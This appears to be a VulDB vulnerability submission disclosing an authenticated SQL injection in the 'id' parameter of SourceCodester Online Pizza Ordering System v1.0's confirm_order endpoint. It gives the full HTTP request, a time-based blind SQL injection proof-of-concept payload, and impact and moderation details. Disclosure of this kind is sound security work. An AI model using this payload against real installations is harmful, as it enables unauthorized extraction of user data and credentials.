Title | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
---|
Description | Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391
Tested On:
Ubuntu Server 22.04.3 LTS
Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order
Request:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1
Affected Parameter:
id
Proof of Concept:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
Impact:
SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.
Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
|
---|
User | simon.davis8080 (ID 54983) |
---|
Submission | 10/05/2023 10:30 (8 months ago) |
---|
Moderation | 10/05/2023 12:01 (2 hours later) |
---|
Status | Accepted |
---|
VulDB Entry | 241384 |
---|